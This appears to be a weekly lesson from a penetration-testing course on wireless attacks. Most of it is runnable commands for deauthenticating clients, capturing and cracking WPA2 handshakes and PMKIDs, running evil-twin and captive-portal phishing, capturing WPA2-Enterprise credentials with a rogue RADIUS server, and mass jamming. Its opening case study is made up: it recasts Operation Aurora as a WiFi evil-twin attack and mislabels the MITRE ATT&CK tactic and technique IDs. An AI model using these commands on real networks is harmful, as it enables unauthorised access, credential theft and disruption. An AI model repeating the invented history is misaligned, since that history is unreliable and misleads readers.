Week 8: Wireless Network Security
MITRE ATT&CK: Tactic — TA0042 (Impact), Technique — T1602 (Data from Local Network), T1557 (Man-in-the-Middle)
Real-World Attack Scenario: The Operation Aurora Enterprise WiFi Attack
Operation Aurora (2009) targeted Google and 30+ other companies. A key component was wireless network compromise:
- WiFi Reconnaissance: Attackers collected WiFi probe requests from employees at airports and cafes
- Network Identification: Used SSID patterns to identify company laptops (BSSIDs like "Google STAFF")
- Evil Twin Attack: Created rogue access points with matching SSIDs in hotel lobbies and conference areas
- Credential Capture: When employees' devices auto-connected, credentials were sent in cleartext
- VPN Exploitation: Used captured credentials to access corporate VPN
- Persistence: Established persistent access through multiple jump points
Real attack tools used: -airserv-ng: Turned wireless card into server for remote access -airodump-ng: Captured handshakes and client associations -aireplay-ng: Deauthentication to force reconnection -hostapd-wpe: Created rogue Access Points with enterprise authentication prompts
Why this week matters: Wireless networks extend beyond your physical perimeter. Employees connecting to "Free WiFi" at cafes creates attack opportunities. Understanding WPA2 cracking, Evil Twin attacks, and wireless reconnaissance is essential for assessing the true network perimeter.
Objectives
- Understand WiFi protocols and security mechanisms
- Capture and crack WPA2 handshakes
- Perform Evil Twin and rogue AP attacks
- Conduct wireless reconnaissance and auditing
WiFi Fundamentals
802.11 Frame Types
Management Frames: Beacon, Probe Request/Response, Association, Authentication
Control Frames: RTS/CTS, ACK, PS-Poll
Data Frames: Data (encrypted payload)Security Protocols
| Protocol | Security | Notes |
|---|---|---|
| Open | None | Fully open, everything visible |
| WEP | Weak | RC4 cipher, easily cracked, avoid |
| WPA | Moderate | TKIP, vulnerable to attacks |
| WPA2-PSK | Good | AES-CCMP, strong with long passphrase |
| WPA2-Enterprise | Best | RADIUS authentication, individual creds |
| WPA3 | Best | SAE (forward secrecy), Dragonblood vulnerable |
WiFi Bands
2.4 GHz (802.11b/g/n): Longer range, more interference, 14 channels (1-14)
5 GHz (802.11a/n/ac/ax): Shorter range, less congestion, many channels
6 GHz (802.11ax): Newest, short rangeInitial Recon
Discover Networks
bash
# Using airmon-ng
airmon-ng start wlan0 # Start monitor mode (creates wlan0mon)
airmon-ng start wlan0 # Or use phy0, check with iwconfig
# Discover networks
airodump-ng wlan0mon # Shows all APs and clients
airodump-ng wlan0mon --channel 6 # Focus on specific channel
# Stop monitor mode when done
airmon-ng stop wlan0monCapturing Output
bash
airodump-ng wlan0mon --output-format csv -w wifi_scan
# Creates wifi_scan-01.csv, wifi_scan-01.cap
# Focus on specific AP
airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6 -w captureDisplay Filters (for .cap files)
bash
# With tcpdump
tcpdump -r capture.cap -n | grep -i "beacon"
# With Wireshark
# wlan.addr == AA:BB:CC:DD:EE:FF (specific AP)
# wlan.ssid == "TargetNetwork" (specific SSID)
# radiotap.channel == 6 (specific channel)WPA2-PSK Cracking
Handshake Capture
bash
# Step 1: Monitor target
airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6 -w handshake_capture
# Step 2: Deauth to force reconnection (in another terminal)
aireplay-ng wlan0mon -0 5 -a AA:BB:CC:DD:EE:FF
# -0 = deauth, 5 = number of deauths, -a = AP MAC
# Or deauth all clients
aireplay-ng wlan0mon -0 5 -a AA:BB:CC:DD:EE:FF -c FF:FF:FF:FF:FF:FF
# Step 3: Verify handshake captured
# Look in airodump: "WPA handshake: AA:BB:CC:DD:EE:FF"Wordlist Attacks
bash
# Basic wordlist
aircrack-ng handshake.cap -w wordlist.txt
# With hashcat
# Convert cap to hccapx
cap2hccapx.bin handshake.cap handshake.hccapx
hashcat -m 2500 handshake.hccapx wordlist.txt
# Rockyou
gunzip /usr/share/wordlists/rockyou.txt.gz 2>/dev/null
aircrack-ng handshake.cap -w /usr/share/wordlists/rockyou.txtRule-Based Attacks
bash
# Hashcat rules for mutations
# Common: append numbers, leet speak
# Example rule file: best64.rule
hashcat -m 2500 handshake.hccapx wordlist.txt -r rules/best64.rulePMKID Attack (No Handshake Needed)
bash
# Some routers leak PMKID
# Check with hcxdumptool
apt install hcxtools
hcxdumptool -i wlan0mon -o pmkid.pcapng --active_beacon
# Then extract and crack
hcxpcaptool -z pmkid_hash.txt pmkid.pcapng
hashcat -m 16800 pmkid_hash.txt wordlist.txtEvil Twin Attack
Setup
bash
# Create fake AP
airbase-ng -e "Free WiFi" -c 6 wlan0mon
# Or hostapd
apt install hostapd
# Create hostapd.conf
interface=wlan0mon
ssid=FreeWiFi
hw_mode=g
channel=6
driver=nl80211Captive Portal Fake
bash
# Use mana-toolkit or wifiphisher
wifiphisher -i wlan0mon
# Or manual:
# 1. Create fake AP with same SSID as target
# 2. Deauth clients from real AP
# 3. Clients connect to fake AP
# 4. Serve login page
# 5. Capture PSK or credentialsKARM Attack (Karmatic)
bash
# Part of mana-toolkit
git clone https://github.com/sensepost/hostapd-mana
cd hostapd-mana
./configure
make
# Run hostapd-mana with karma enabledWPA2 Enterprise Attacks
Rogue RADIUS Server
bash
# Install Freeradius
apt install freeradius
# Create fake AP with hostapd-wpe
hostapd-wpe wlan0mon -c hostapd-wpe.conf
# When users connect, they see certificate prompt
# If they accept, we capture credentials
# MSCHAPv2 can be cracked with asleap/hashcatExtract Credentials
bash
# From eap MD5 or LEAP
asleap -r capture.pcap -f dictionary.txt
# Convert to hashcat format
# MSCHAPv2: hashcat -m 5500Bluetooth Security
Discovery
bash
# BlueZ tools
hcitool scan
hcitool inq
bt-adapter -d
# Bluedroid
bluetoothctl
[bluetooth]# scan on
[bluetooth]# devicesSniffing (Ubertooth)
bash
# Ubertooth One required
ubertooth-btle -f -c capture.pcap
ubertooth-util -t
# Kismet
kismet -w wlan0mon,wlxd037453a1234WiFi Jamming / Denial
Deauthentication
bash
# Targeted
aireplay-ng wlan0mon -0 10 -a AA:BB:CC:DD:EE:FF -c FF:FF:FF:FF:FF:FF
# Mass deauth (all networks)
mdk4 wlan0mon d
# Use with caution - this is DoS, often illegalRogue AP Detection
From Defender Perspective
bash
# Monitor for suspicious APs
airodump-ng wlan0mon
# Look for:
# - APs with same SSID but different BSSID
# - Unexpected open networks
# - High TX power (distant attacker nearby)
# Use tools
airgeddon # Multi-tool with Evil Twin detectionPractice Labs
Lab 1: WPA2 Handshake Capture
bash
# Prerequisites:
# - Kali with monitor mode interface
# - Another device connected to a WPA2 network
# - Proximity to the target network
# Step 1: Set monitor mode
airmon-ng start wlan0
# Step 2: Capture handshakes
airodump-ng wlan0mon --bssid <target_router_mac> -c <channel> -w wpa_capture
# Step 3: Deauth the client
aireplay-ng wlan0mon -0 5 -a <router_mac> -c <client_mac>
# Step 4: Crack with wordlist
aircrack-ng wpa_capture-01.cap -w /usr/share/wordlists/rockyou.txtLab 2: Evil Twin Attack
bash
# Create fake AP with hostapd
# Configure hostapd.conf with target SSID
# Deauth real AP clients
# Capture when they connect to fake APLab 3: PMKID Attack
bash
# If supported by target router
hcxdumptool -i wlan0mon -o pmkid_capture.pcapng --active_beacon
# Let it run for a while near target
# Extract hash
hcxpcaptool -z pmkid_hashes.txt pmkid_capture.pcapng
# Crack
hashcat -m 16800 pmkid_hashes.txt wordlist.txtDefense Recommendations
| Risk | Mitigation |
|---|---|
| Dictionary attacks | Strong passphrase (16+ chars, random) |
| Evil Twin | Verify AP MAC, check for HTTPS captive portals |
| Rogue AP | Monitor for unexpected SSIDs, use 802.1X |
| Karma/Hostapd | Be suspicious of multiple APs with same name |
| Enterprise attacks | User training, certificate pinning |
Key Takeaways
- WPA2-PSK — crackable with handshake capture + wordlist
- Strong passwords — 16+ characters, random, no dictionary words
- WPA3 — SAE provides forward secrecy, but has vulnerabilities
- Monitor mode — airmon-ng, airodump-ng, aireplay-ng
- Evil Twin — deauth + fake AP; capture when clients reconnect
- Enterprise — RADIUS auth helps, but can still be impersonated
Next Week Preview
Week 9 covers Privilege Escalation — the critical step after initial access. You'll learn Linux sudo/suid exploits, kernel exploits, Windows token abuse, and DLL hijacking.